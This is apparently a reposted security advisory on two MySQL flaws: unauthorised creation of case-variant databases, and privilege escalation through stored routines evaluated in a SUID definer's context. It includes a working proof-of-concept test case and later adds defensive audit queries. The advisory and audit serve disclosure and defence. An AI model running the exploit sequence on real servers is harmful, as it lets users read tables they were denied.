A Discussion of MySQL Privilege Escalation and Security Restriction Issues
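The following article mainly covers the practical application of the MySQL privilege escalation and security restriction bypass vulnerabilities. A few days ago I saw material on the practical application of these vulnerabilities on a related website and thought it was quite good, so today I am sharing it with everyone.
Affected systems:
MySQL AB MySQL
Description:
BUGTRAQ ID: 19559
MySQL is a very widely used open-source relational database system, with versions available for a variety of platforms.
In MySQL, a user who has access privileges but not the create privilege can create a new database whose name differs from that of a database they can access only in letter case. Successful exploitation requires that the file system on which MySQL runs supports case-sensitive file names.
In addition, because the arguments of suid routines are evaluated in the wrong security context, an attacker can use stored routines to execute arbitrary DML statements with the privileges of the routine's definer. A successful attack requires that the user has the EXECUTE privilege on the stored routine.
Test method:
[Warning: The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!]
1. Create a database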
```
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard
mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)
```
2. Privilege escalation
```sql
# mysqltest test-case format: run with the mysqltest client, not the interactive mysql shell
--disable_warnings
drop database if exists mysqltest1;
drop database if exists mysqltest2;
drop function if exists f_suid;
--enable_warnings
# Prepare playground
create database mysqltest1;
create database mysqltest2;
create user malory@localhost;
grant all privileges on mysqltest1.* to malory@localhost;
# Create harmless (but SUID!) function
create function f_suid(i int) returns int return 0;
grant execute on function test.f_suid to malory@localhost;
use mysqltest2;
# Create table in which malory@localhost will be interested but to which
# he won't have any access
create table t1 (i int);
connect (malcon, localhost, malory,,mysqltest1);
# Correct: malory@localhost doesn't have access to mysqltest2.t1
--error ER_TABLEACCESS_DENIED_ERROR
select * from mysqltest2.t1;
# Create function which will allow to exploit security hole
delimiter |;
create function f_evil ()
returns int
sql security invoker
begin
  set @a:= current_user();
  set @b:= (select count(*) from mysqltest2.t1);
  return 0;
end|
delimiter ;|
# Again correct
--error ER_TABLEACCESS_DENIED_ERROR
select f_evil();
select @a, @b;
# Oops!!! it seems that f_evil() is executed in the context of
# f_suid() definer, so malory@localhost gets all info that he wants
select test.f_suid(f_evil());
select @a, @b;
connection default;
drop user malory@localhost;
drop database mysqltest1;
drop database mysqltest2;
```
Recommendation:
Vendor patch: MySQL AB. The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's home page.
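An audit for the two conditions described above, added here as an example and not part of the original advisory or any vendor code. It assumes a server that provides `information_schema` and `mysql.procs_priv`, and an auditing account allowed to read the `mysql` schema.

```sql
-- Added audit example; not from the original advisory.
-- Assumption: information_schema and mysql.procs_priv exist on this server
-- and the auditing account may read the mysql schema.

-- 0 means database names are stored and compared case-sensitively, which is
-- the precondition the advisory names for the case-variant database issue.
SELECT @@lower_case_table_names AS lower_case_table_names;

-- 1. Databases whose names differ only in letter case (e.g. sample / sAmple).
--    Any row here should be traced back to who created the variant and when.
SELECT LOWER(SCHEMA_NAME) AS folded_name,
       COUNT(*)           AS variants,
       GROUP_CONCAT(SCHEMA_NAME ORDER BY SCHEMA_NAME SEPARATOR ', ') AS names
FROM information_schema.SCHEMATA
GROUP BY LOWER(SCHEMA_NAME)
HAVING COUNT(*) > 1;

-- 2. Routines that run with the definer's rights and carry a routine-level
--    EXECUTE grant to an account other than the definer. These are the
--    routines whose callers matter until the vendor patch is installed.
SELECT r.ROUTINE_SCHEMA,
       r.ROUTINE_NAME,
       r.ROUTINE_TYPE,
       r.DEFINER,
       CONCAT(p.User, '@', p.Host) AS grantee
FROM information_schema.ROUTINES AS r
JOIN mysql.procs_priv AS p
  ON  p.Db           = r.ROUTINE_SCHEMA
  AND p.Routine_name = r.ROUTINE_NAME
  AND p.Routine_type = r.ROUTINE_TYPE
WHERE r.SECURITY_TYPE = 'DEFINER'
  AND FIND_IN_SET('Execute', p.Proc_priv) > 0
  AND CONCAT(p.User, '@', p.Host) <> r.DEFINER
ORDER BY r.DEFINER, r.ROUTINE_SCHEMA, r.ROUTINE_NAME;
```

The second query covers only routine-level grants such as the `grant execute on function test.f_suid` in the test case; EXECUTE granted at database or global level is recorded in `mysql.db` and `mysql.user` and needs a separate review.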
